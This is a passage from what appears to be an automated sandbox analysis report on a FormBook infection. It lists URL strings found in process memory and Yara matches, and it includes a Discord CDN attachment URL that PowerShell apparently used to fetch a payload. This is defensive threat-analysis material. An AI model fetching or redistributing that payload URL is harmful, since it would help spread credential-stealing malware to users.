          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 0000000C.00000000.2221077301.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 0000000C.00000000.2217921956.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2230941988.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 0000000C.00000000.2217921956.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 0000000C.00000000.2230941988.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 0000000C.00000000.2212091562.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2220685790.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2217921956.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2232348196.000000000B320000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000C.00000000.2232348196.000000000B320000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.disc
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attac
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/85879332208771075
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/858793322087710753/863891
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/858793322087710753/86389185760801590
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/858793322087710753/863891857608015902/oad.jpg
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
          Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49166 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
